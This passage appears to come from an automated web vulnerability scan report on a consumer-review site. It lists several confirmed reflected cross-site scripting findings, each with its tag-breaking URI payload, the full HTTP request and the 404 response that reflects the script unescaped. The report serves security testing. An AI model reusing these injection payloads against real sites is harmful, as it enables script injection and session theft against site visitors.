Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0000C9)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="aboutus.php">About Us</a> <span class="nav_border">|</span> <a href="management.php">Management</a> <span class="nav_border">|</span> <a href="pressroom.php">Press</a><span class="nav_border">|</span><a href="/affiliate_program.php">Affiliate Program</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--> <div id="content" > <h1 style="padding-top:12px;">File Not Found</h1> <p class="welcome"> We're sorry, the file you requested could not be found. </p> <div style="clear:both" ></div> <!--Start Footer--> <div id="footer"></div> <div class="footer_content"> <div class="footer_left"> <h3>All Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p> <a href="/audiobooks/">Audio Books</a><br /> <a href="/auto_insurance/">Auto Insurance</a><br /> <a href="/credit_cards/">Credit Cards</a><br /> <a href="/credit_report_monitoring/">Credit Monitoring</a><br /> <a href="/diet_services/">Diet Programs</a><br /> <a href="/online_dvd_rental_services/">DVD Rental</a></p></td> <td><p> <a href="/genealogy/">Genealogy</a><br /> <a href="/identity_theft_protection_services/">Identity Theft</a><br /> <a href="/internet_fax/">Internet Fax</a><br /> <a href="/online_backup_services/">Online Backup</a><br /> <a href="/online_college/">Online College</a><br/> <a href="/online_dating/">Online Dating</a></p></td> <td><p> <a href="/online_meeting/">Online Meeting</a><br /> <a href="/parental_controls/">Parental Controls</a><br /> <a href="/payday_loans/">Payday Loans</a><br /> <a href="/people_search/">People Search</a><br /> <a href="/remote_desktop/">Remote Desktop</a><br /> <a href="/savings_accounts/">Savings Accounts</a> </p></td> <td><p> <a href="/internet_security_software/">Security Software</a><br /> <a href="/online_tax_preparation_services/">Tax Preparation</a><br /> <a href="/virtual_phone/">Virtual Phone</a><br /> <a href="/voip_services/">VoIP Services</a><br /> <a href="/web_hosting/">Web Hosting</a></p></td> </tr></table> </div> <div class="footer_right"><h3>Popular Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p><a href="/credit_report_monitoring/">Credit Monitoring Services</a><br /> <a href="/identity_theft_protection_services/">Identity Theft Services</a><br /> <a href="/web_hosting/">Web Hosting Services</a></p></td> <td><p><a href="/online_dating/">Online Dating Services</a><br /> <a href="/diet_services/">Online Diet Programs</a><br /> <a href="/voip_services/">VoIP Services</a></p></td> </tr> </table><div class="next_latest"><p><a href="/">NextAdvisor Home</a> <span>|</span><a href="/blog/">Latest Blog Headlines</a></p></div> </div> <br style="clear:both" /> </div> <!--End Footer Category--> <!--Start Bottom--> <div id="bottom"> <div id="logo_sml"> <div style="float:left;"><a href="/"><img src="/images/nextadvisor1_sml.gif" alt="" width="116" height="15" /></a><span class="bottomlink"><a href="/aboutus.php">About Us</a></span><span class="bottomlink"><a href="/blog">Blog</a></span><span class="bottomlink"><a href="/contactus.php">Contact Us</a></span><span class="bottomlink"><a href="/privacy.php">Terms &amp; Privacy Policy</a></span><span class="bottomlink"><a href="/affiliate_program.php">Affiliate Program</a></span><span class="bottomlink"><a href="/sitemap.php">Site Map</a></span><span class="bottomlink"><a href="http://twitter.com/nextadvisor" target="_blank">Follow Us On Twitter</a></span></div><div style="margin:3px 0 0 0; float:left"><a href="http://twitter.com/nextadvisor" target="_blank" style="text-decoration:none;"><img src="/images/twitter.gif" /></a></div><br style="clear:both"/> <!--End Bottom--> <p class="copyright">Copyright&#169; 2006 - 2011 NextAdvisor.com - All rights reserved.</p> </div> <!-- /logo_sml --> </div> <!-- /bottom --> <!--End Footer--> </div> <!--End Content--> <br style="clear:both" /> </div><!--End Content Container--></div><!--End Container--><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-246595-2");pageTracker._trackPageview();} catch(err) {}</script></body></html>
- /link.php~'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DA)%3C/script%3E

/link.php~'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DA)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/link.php~'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DA)%3C..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0000DA)</script>

Request

GET /link.php~'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000DA)%3C/script%3E HTTP/1.1
Referer: http://www.nextadvisor.com/link.php~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:55:59 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3526
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title>Online Reviews</title><meta name="description" content="Compare services at NextAdvisor.com to help you choose the best service for your needs."/><meta name="keywords" content="NextAdvisor, NextAdvisor.com, Next Advisor, NextAdviser, Next Adviser, ConsumerCompare, ConsumerCompare.org, voip, credit reports, identity theft, online education, dvd rental, diet, internet phone service, credit scores, id theft, online schools, movie rental, online diet programs, Vonage, Voip.com, Equifax, CreditCheck Total, FreeCreditreport.com, Identity Guard, LifeLock, TrustedID, LoudSiren, PrivacyMatters, University of Phoenix, Capella University, AIU, eDiets, South Beach Diet, Blockbuster, Netflix, Cinemanow" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/link.php~'"--></style></script><script>netsparker(0x0000DA)</script>" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0000DA)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="aboutus.php">About Us</a> <span class="nav_border">|</span> <a href="management.php">Management</a> <span class="nav_border">|</span> <a href="pressroom.php">Press</a><span class="nav_border">|</span><a href="/affiliate_program.php">Affiliate Program</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--> <div id="content" > <h1 style="padding-top:12px;">File Not Found</h1> <p class="welcome"> We're sorry, the file you requested could not be found. </p> <div style="clear:both" ></div> <!--Start Footer--> <div id="footer"></div> <div class="footer_content"> <div class="footer_left"> <h3>All Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p> <a href="/audiobooks/">Audio Books</a><br /> <a href="/auto_insurance/">Auto Insurance</a><br /> <a href="/credit_cards/">Credit Cards</a><br /> <a href="/credit_report_monitoring/">Credit Monitoring</a><br /> <a href="/diet_services/">Diet Programs</a><br /> <a href="/online_dvd_rental_services/">DVD Rental</a></p></td> <td><p> <a href="/genealogy/">Genealogy</a><br /> <a href="/identity_theft_protection_services/">Identity Theft</a><br /> <a href="/internet_fax/">Internet Fax</a><br /> <a href="/online_backup_services/">Online Backup</a><br /> <a href="/online_college/">Online College</a><br/> <a href="/online_dating/">Online Dating</a></p></td> <td><p> <a href="/online_meeting/">Online Meeting</a><br /> <a href="/parental_controls/">Parental Controls</a><br /> <a href="/payday_loans/">Payday Loans</a><br /> <a href="/people_search/">People Search</a><br /> <a href="/remote_desktop/">Remote Desktop</a><br /> <a href="/savings_accounts/">Savings Accounts</a> </p></td> <td><p> <a href="/internet_security_software/">Security Software</a><br /> <a href="/online_tax_preparation_services/">Tax Preparation</a><br /> <a href="/virtual_phone/">Virtual Phone</a><br /> <a href="/voip_services/">VoIP Services</a><br /> <a href="/web_hosting/">Web Hosting</a></p></td> </tr></table> </div> <div class="footer_right"><h3>Popular Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p><a href="/credit_report_monitoring/">Credit Monitoring Services</a><br /> <a href="/identity_theft_protection_services/">Identity Theft Services</a><br /> <a href="/web_hosting/">Web Hosting Services</a></p></td> <td><p><a href="/online_dating/">Online Dating Services</a><br /> <a href="/diet_services/">Online Diet Programs</a><br /> <a href="/voip_services/">VoIP Services</a></p></td> </tr> </table><div class="next_latest"><p><a href="/">NextAdvisor Home</a> <span>|</span><a href="/blog/">Latest Blog Headlines</a></p></div> </div> <br style="clear:both" /> </div> <!--End Footer Category--> <!--Start Bottom--> <div id="bottom"> <div id="logo_sml"> <div style="float:left;"><a href="/"><img src="/images/nextadvisor1_sml.gif" alt="" width="116" height="15" /></a><span class="bottomlink"><a href="/aboutus.php">About Us</a></span><span class="bottomlink"><a href="/blog">Blog</a></span><span class="bottomlink"><a href="/contactus.php">Contact Us</a></span><span class="bottomlink"><a href="/privacy.php">Terms &amp; Privacy Policy</a></span><span class="bottomlink"><a href="/affiliate_program.php">Affiliate Program</a></span><span class="bottomlink"><a href="/sitemap.php">Site Map</a></span><span class="bottomlink"><a href="http://twitter.com/nextadvisor" target="_blank">Follow Us On Twitter</a></span></div><div style="margin:3px 0 0 0; float:left"><a href="http://twitter.com/nextadvisor" target="_blank" style="text-decoration:none;"><img src="/images/twitter.gif" /></a></div><br style="clear:both"/> <!--End Bottom--> <p class="copyright">Copyright&#169; 2006 - 2011 NextAdvisor.com - All rights reserved.</p> </div> <!-- /logo_sml --> </div> <!-- /bottom --> <!--End Footer--> </div> <!--End Content--> <br style="clear:both" /> </div><!--End Content Container--></div><!--End Container--><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-246595-2");pageTracker._trackPageview();} catch(err) {}</script></body></html>
- /includes/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00010D)%3C/script%3E

/includes/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00010D)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/includes/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00010D)%3C..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x00010D)</script>

Request

GET /includes/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00010D)%3C/script%3E HTTP/1.1
Referer: http://www.nextadvisor.com/includes/javascript.php?script=jquery.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:56:03 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3524
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title>Online Reviews</title><meta name="description" content="Compare services at NextAdvisor.com to help you choose the best service for your needs."/><meta name="keywords" content="NextAdvisor, NextAdvisor.com, Next Advisor, NextAdviser, Next Adviser, ConsumerCompare, ConsumerCompare.org, voip, credit reports, identity theft, online education, dvd rental, diet, internet phone service, credit scores, id theft, online schools, movie rental, online diet programs, Vonage, Voip.com, Equifax, CreditCheck Total, FreeCreditreport.com, Identity Guard, LifeLock, TrustedID, LoudSiren, PrivacyMatters, University of Phoenix, Capella University, AIU, eDiets, South Beach Diet, Blockbuster, Netflix, Cinemanow" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/includes/'"--></style></script><script>netsparker(0x00010D)</script>" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x00010D)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="aboutus.php">About Us</a> <span class="nav_border">|</span> <a href="management.php">Management</a> <span class="nav_border">|</span> <a href="pressroom.php">Press</a><span class="nav_border">|</span><a href="/affiliate_program.php">Affiliate Program</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--> <div id="content" > <h1 style="padding-top:12px;">File Not Found</h1> <p class="welcome"> We're sorry, the file you requested could not be found. </p> <div style="clear:both" ></div> <!--Start Footer--> <div id="footer"></div> <div class="footer_content"> <div class="footer_left"> <h3>All Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p> <a href="/audiobooks/">Audio Books</a><br /> <a href="/auto_insurance/">Auto Insurance</a><br /> <a href="/credit_cards/">Credit Cards</a><br /> <a href="/credit_report_monitoring/">Credit Monitoring</a><br /> <a href="/diet_services/">Diet Programs</a><br /> <a href="/online_dvd_rental_services/">DVD Rental</a></p></td> <td><p> <a href="/genealogy/">Genealogy</a><br /> <a href="/identity_theft_protection_services/">Identity Theft</a><br /> <a href="/internet_fax/">Internet Fax</a><br /> <a href="/online_backup_services/">Online Backup</a><br /> <a href="/online_college/">Online College</a><br/> <a href="/online_dating/">Online Dating</a></p></td> <td><p> <a href="/online_meeting/">Online Meeting</a><br /> <a href="/parental_controls/">Parental Controls</a><br /> <a href="/payday_loans/">Payday Loans</a><br /> <a href="/people_search/">People Search</a><br /> <a href="/remote_desktop/">Remote Desktop</a><br /> <a href="/savings_accounts/">Savings Accounts</a> </p></td> <td><p> <a href="/internet_security_software/">Security Software</a><br /> <a href="/online_tax_preparation_services/">Tax Preparation</a><br /> <a href="/virtual_phone/">Virtual Phone</a><br /> <a href="/voip_services/">VoIP Services</a><br /> <a href="/web_hosting/">Web Hosting</a></p></td> </tr></table> </div> <div class="footer_right"><h3>Popular Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p><a href="/credit_report_monitoring/">Credit Monitoring Services</a><br /> <a href="/identity_theft_protection_services/">Identity Theft Services</a><br /> <a href="/web_hosting/">Web Hosting Services</a></p></td> <td><p><a href="/online_dating/">Online Dating Services</a><br /> <a href="/diet_services/">Online Diet Programs</a><br /> <a href="/voip_services/">VoIP Services</a></p></td> </tr> </table><div class="next_latest"><p><a href="/">NextAdvisor Home</a> <span>|</span><a href="/blog/">Latest Blog Headlines</a></p></div> </div> <br style="clear:both" /> </div> <!--End Footer Category--> <!--Start Bottom--> <div id="bottom"> <div id="logo_sml"> <div style="float:left;"><a href="/"><img src="/images/nextadvisor1_sml.gif" alt="" width="116" height="15" /></a><span class="bottomlink"><a href="/aboutus.php">About Us</a></span><span class="bottomlink"><a href="/blog">Blog</a></span><span class="bottomlink"><a href="/contactus.php">Contact Us</a></span><span class="bottomlink"><a href="/privacy.php">Terms &amp; Privacy Policy</a></span><span class="bottomlink"><a href="/affiliate_program.php">Affiliate Program</a></span><span class="bottomlink"><a href="/sitemap.php">Site Map</a></span><span class="bottomlink"><a href="http://twitter.com/nextadvisor" target="_blank">Follow Us On Twitter</a></span></div><div style="margin:3px 0 0 0; float:left"><a href="http://twitter.com/nextadvisor" target="_blank" style="text-decoration:none;"><img src="/images/twitter.gif" /></a></div><br style="clear:both"/> <!--End Bottom--> <p class="copyright">Copyright&#169; 2006 - 2011 NextAdvisor.com - All rights reserved.</p> </div> <!-- /logo_sml --> </div> <!-- /bottom --> <!--End Footer--> </div> <!--End Content--> <br style="clear:both" /> </div><!--End Content Container--></div><!--End Container--><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-246595-2");pageTracker._trackPageview();} catch(err) {}</script></body></html>
- /includes/javascript.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000144)%3C/script%3E

/includes/javascript.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000144)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/includes/javascript.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealer..

Parameters

Parameter Type Value
script GET jquery.js
URI-BASED Raw URI '"--></style></script><script>alert(0x000144)</script>

Request

GET /includes/javascript.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000144)%3C/script%3E HTTP/1.1
Referer: http://www.nextadvisor.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:56:18 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3525
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title>Online Reviews</title><meta name="description" content="Compare services at NextAdvisor.com to help you choose the best service for your needs."/><meta name="keywords" content="NextAdvisor, NextAdvisor.com, Next Advisor, NextAdviser, Next Adviser, ConsumerCompare, ConsumerCompare.org, voip, credit reports, identity theft, online education, dvd rental, diet, internet phone service, credit scores, id theft, online schools, movie rental, online diet programs, Vonage, Voip.com, Equifax, CreditCheck Total, FreeCreditreport.com, Identity Guard, LifeLock, TrustedID, LoudSiren, PrivacyMatters, University of Phoenix, Capella University, AIU, eDiets, South Beach Diet, Blockbuster, Netflix, Cinemanow" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/includes/javascript.php'"--></style></script><script>netsparker(0x000144)</script>" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var 